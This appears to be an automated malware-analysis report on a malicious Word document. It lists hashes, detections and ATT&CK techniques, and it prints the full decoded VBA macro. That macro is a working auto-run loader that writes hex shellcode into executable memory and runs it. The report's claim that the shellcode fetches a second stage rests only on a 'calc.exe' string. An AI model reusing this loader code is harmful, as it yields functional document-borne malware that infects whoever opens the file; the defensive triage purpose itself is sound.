Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4f3ca24eaaba8f94…

MALICIOUS

Office (OLE)

30.5 KB Created: 2015-03-19 13:21:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 12aa0413c9210064510218b20ba2fa1c SHA-1: 7513ff4cd7ac56cfb5ab845f5ce8186a4765e8ef SHA-256: 4f3ca24eaaba8f942217710c4e8973ea4a2874ae846e8acd2160adc13bc92ab0
192 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1071.001 Web Protocols T1105 Ingress Tool Transfer

The sample contains a VBA macro that executes upon opening the document. This macro decodes and writes shellcode to memory using WriteProcessMemory, and then attempts to execute it. The shellcode appears to be designed to download and execute a second-stage payload, as indicated by the presence of 'calc.exe' in the decoded shellcode, which is a common placeholder for execution. The ClamAV detection 'Doc.Dropper.Agent-6444290-0' further supports its role as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6444290-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6444290-0
  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2031 bytes
SHA-256: 375d1492cda8e1534ed27cd616a29e17d80745e8738b65a1725f6b04379758be
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function allocateMemory Lib "ntdll" Alias "ZwAllocateVirtualMemory" (ProcessHandle As Long, BaseAddress As Any, ByVal ZeroBits As Long, RegionSize As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long
Private Declare Function copyMemory Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long


Private Sub Document_Open()

Dim shellCode As String
Dim shellLength As Long
Dim byteArray() As Byte
Dim memoryAddress As Long
Dim zL As Long
zL = 0
Dim rL As Long

shellCode = "fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ff"
shellCode = shellCode & "e05f5f5a8b12eb8d5d6a018d85b20000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c632e65786500"

shellLength = Len(shellCode) / 2
ReDim byteArray(0 To shellLength)

For i = 0 To shellLength - 1

    If i = 0 Then
        pos = i + 1
    Else
        pos = i * 2 + 1
    End If
    Value = Mid(shellCode, pos, 2)
    byteArray(i) = Val("&H" & Value)

Next

memoryAddress = allocateMemory(ByVal -1, rL, zL, &H5000, &H1000, &H40)
memoryAddress = rL

copyMemory ByVal -1, memoryAddress, VarPtr(byteArray(0)), UBound(byteArray) + 1, zL

executeResult = shellExecute(zL, memoryAddress, zL)

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.